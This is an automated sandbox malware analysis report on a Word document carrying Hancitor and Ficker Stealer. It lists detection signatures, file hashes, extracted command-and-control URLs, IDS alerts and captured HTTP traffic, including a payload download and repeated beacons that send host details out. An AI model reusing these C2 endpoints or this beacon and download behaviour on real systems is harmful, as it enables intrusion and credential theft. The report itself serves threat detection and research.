Windows Analysis Report 0708_3355614568218.doc

Overview

General Information

Sample Name:	0708_3355614568218.doc
Analysis ID:	446230
MD5:	992338b40b38f1f55bd4a9599f70771c
SHA1:	866086438592043aebb88f3da34ad437681a5cb0
SHA256:	b4d402b4ab3b5a5568f35562955d5d05357a589ccda55fde5a2c166ef5f15699
Tags:	docHancitormacrosMAN1MoskalvzapoeTA511
Infos:
Most interesting Screenshot:

Detection

Ficker Stealer Hancitor

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Suspect Svchost Activity

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected Ficker Stealer

Yara detected Hancitor

C2 URLs / IPs found in malware configuration

Contains functionality to inject threads in other processes

Document contains OLE streams with PE executables

Document contains an embedded VBA macro which may execute processes

Document contains an embedded VBA macro with suspicious strings

Document exploit detected (process start blacklist hit)

May check the online IP address of the machine

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Suspicious Svchost Process

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Downloads executable code via HTTP

Drops PE files

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000003.00000003.2143615894.00000000003A0000.00000040.00000001.sdmp

Malware Configuration Extractor: Hancitor {"Campaign Id": "0707_wvcr", "C2 list": ["http://sudepallon.com/8/forum.php", "http://anspossthrly.ru/8/forum.php", "http://thentabecon.ru/8/forum.php"]}

Multi AV Scanner detection for domain / URL

Source: srand04rf.ru	Virustotal: Detection: 13%			Perma Link
Source: pospvisis.com	Virustotal: Detection: 12%			Perma Link

Multi AV Scanner detection for submitted file

Source: 0708_3355614568218.doc

Virustotal: Detection: 37%

Perma Link

Antivirus or Machine Learning detection for unpacked file

Source: 3.2.rundll32.exe.2110000.6.unpack

Avira: Label: TR/Hijacker.Gen

Location Tracking:

Yara detected Hancitor

Source: Yara match	File source: 3.3.rundll32.exe.3a4392.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.3a4392.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2110000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.2143615894.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2346335885.0000000002114000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2668, type: MEMORY

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02112CD0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	3_2_02112CD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02112D17 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	3_2_02112D17
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02112D98 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	3_2_02112D98
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02112D55 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	3_2_02112D55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02112D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	3_2_02112D78
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040BAB5 CryptUnprotectData,	5_2_0040BAB5

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: c:\equate\717\862\Kil\Turn\design.pdb source: rundll32.exe, 00000003.00000002.2346397243.000000000213D000.00000002.00020000.sdmp, 0708_3355614568218.doc

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\nimb.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\nimb.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\nimb.dll	Jump to behavior

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: nimb.dll.0.dr

Jump to dropped file

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\rundll32.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: api.ipify.org

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 50.19.92.227:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 50.19.92.227:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031074 ET TROJAN Win32/Ficker Stealer Activity 95.213.179.67:80 -> 192.168.2.22:49172
Source: Traffic	Snort IDS: 2031132 ET TROJAN Win32/Ficker Stealer Activity M3 192.168.2.22:49172 -> 95.213.179.67:80
Source: Traffic	Snort IDS: 2031074 ET TROJAN Win32/Ficker Stealer Activity 95.213.179.67:80 -> 192.168.2.22:49178
Source: Traffic	Snort IDS: 2031132 ET TROJAN Win32/Ficker Stealer Activity M3 192.168.2.22:49178 -> 95.213.179.67:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://sudepallon.com/8/forum.php
Source: Malware configuration extractor	URLs: http://anspossthrly.ru/8/forum.php
Source: Malware configuration extractor	URLs: http://thentabecon.ru/8/forum.php

May check the online IP address of the machine

Source: C:\Windows\SysWOW64\rundll32.exe	DNS query: name: api.ipify.org
Source: C:\Windows\SysWOW64\rundll32.exe	DNS query: name: api.ipify.org
Source: C:\Windows\SysWOW64\rundll32.exe	DNS query: name: api.ipify.org
Source: C:\Windows\SysWOW64\svchost.exe	DNS query: name: api.ipify.org
Source: C:\Windows\SysWOW64\svchost.exe	DNS query: name: api.ipify.org
Source: C:\Windows\SysWOW64\svchost.exe	DNS query: name: api.ipify.org

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 09 Jul 2021 01:07:42 GMTContent-Type: application/octet-streamContent-Length: 272910Connection: keep-aliveLast-Modified: Wed, 09 Jun 2021 16:00:40 GMTETag: "60c0e5a8-42a0e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 00 00 00 00 00 2a 04 00 00 00 00 00 e0 00 2f 03 0b 01 02 1e 00 50 03 00 00 26 04 00 00 06 00 00 80 14 00 00 00 10 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 80 04 00 00 04 00 00 81 81 04 00 02 00 00 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 04 00 a4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 9b 03 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 52 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 4f 03 00 00 10 00 00 00 50 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 38 00 00 00 00 60 03 00 00 02 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 a8 2d 00 00 00 70 03 00 00 2e 00 00 00 56 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2f 34 00 00 00 00 00 00 14 90 00 00 00 a0 03 00 00 92 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 40 04 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 a4 0e 00 00 00 50 04 00 00 10 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 38 00 00 00 00 60 04 00 00 02 00 00 00 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 70 04 00 00 02 00 00 00 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 50.19.92.227 50.19.92.227
Source: Joe Sandbox View	IP Address: 77.222.42.67 77.222.42.67

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: SWEB-ASRU SWEB-ASRU

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 105Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 30 2e 30 2e 30 2e 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=0.0.0.0&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: GET /7hfjsdfjks.exe HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: srand04rf.ruCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /?format=xml HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
